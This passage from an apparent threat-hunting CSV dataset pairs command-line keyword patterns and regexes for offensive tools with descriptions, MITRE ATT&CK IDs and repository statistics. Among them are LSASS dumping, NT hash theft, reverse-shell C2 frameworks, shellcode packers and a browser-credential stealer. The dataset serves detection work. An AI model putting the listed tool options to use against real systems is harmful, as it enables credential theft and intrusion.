tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --fakedomains *",".{0,1000}\s\-\-fakedomains\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* -fake-hostname *",".{0,1000}\s\-fake\-hostname\s.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* --fakeip *",".{0,1000}\s\-\-fakeip\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* --fakeipv6 *",".{0,1000}\s\-\-fakeipv6\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* --fakemail *",".{0,1000}\s\-\-fakemail\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* fcrdns.nse*",".{0,1000}\sfcrdns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* fenty.py*",".{0,1000}\sfenty\.py.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "* --file ownedusers.txt*",".{0,1000}\s\-\-file\sownedusers\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* file://catspin.yaml *",".{0,1000}\sfile\:\/\/catspin\.yaml\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. 
It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "* --file-smuggler-port *",".{0,1000}\s\-\-file\-smuggler\-port\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "* filetransfer -download -src-file *.exe*/tmp*",".{0,1000}\sfiletransfer\s\-download\s\-src\-file\s.{0,1000}\.exe.{0,1000}\/tmp.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* filetransfer -upload -src-file *.exe*\temp*",".{0,1000}\sfiletransfer\s\-upload\s\-src\-file\s.{0,1000}\.exe.{0,1000}\\temp.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* 
FileZillaPwd*",".{0,1000}\sFileZillaPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* finger.nse*",".{0,1000}\sfinger\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* fingerprint-strings.nse*",".{0,1000}\sfingerprint\-strings\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* firewalk.nse*",".{0,1000}\sfirewalk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* firewall-bypass.nse*",".{0,1000}\sfirewall\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* flash.bat*",".{0,1000}\sflash\.bat.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "* -fluctuate=NA -sleep=*",".{0,1000}\s\-fluctuate\=NA\s\-sleep\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -fluctuate=RW -sleep=*",".{0,1000}\s\-fluctuate\=RW\s\-sleep\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* flume-master-info.nse*",".{0,1000}\sflume\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --flush-attacks*",".{0,1000}\s\-\-flush\-attacks.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "* follina.py *",".{0,1000}\sfollina\.py\s.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "* -force-forwardable",".{0,1000}\s\-force\-forwardable","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* --force-kerb *",".{0,1000}\s\-\-force\-kerb\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* --force-ps32",".{0,1000}\s\-\-force\-ps32","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --ForceShadowCred*",".{0,1000}\s\-\-ForceShadowCred.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "* Forensike.ps1*",".{0,1000}\sForensike\.ps1.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "* forgeTGT(*",".{0,1000}\sforgeTGT\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* --fork --write *.dmp*",".{0,1000}\s\-\-fork\s\-\-write\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* ForkDump.cpp*",".{0,1000}\sForkDump\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "* ForkLib.cpp*",".{0,1000}\sForkLib\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "* --format exe * --jitter *",".{0,1000}\s\-\-format\sexe\s\s.{0,1000}\s\-\-jitter\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* --format kirbi*",".{0,1000}\s\-\-format\skirbi.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* -format=bof *.exe*",".{0,1000}\s\-format\=bof\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=bof -cleanup *",".{0,1000}\s\-format\=bof\s\-cleanup\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE 
Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=dotnet -sleep=*",".{0,1000}\s\-format\=dotnet\s\-sleep\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=dotnet-pinvoke *",".{0,1000}\s\-format\=dotnet\-pinvoke\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=dotnet-pinvoke *.exe*",".{0,1000}\s\-format\=dotnet\-pinvoke\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense 
Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* --format=krb5asrep* --wordlist=*",".{0,1000}\s\-\-format\=krb5asrep.{0,1000}\s\-\-wordlist\=.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* --format=netntlmv2 *.txt*",".{0,1000}\s\-\-format\=netntlmv2\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* --format=NT -w=*_password.txt*",".{0,1000}\s\-\-format\=NT\s\-w\=.{0,1000}_password\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* -format=reflective-dll *",".{0,1000}\s\-format\=reflective\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=reflective-dll *.exe*",".{0,1000}\s\-format\=reflective\-dll\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
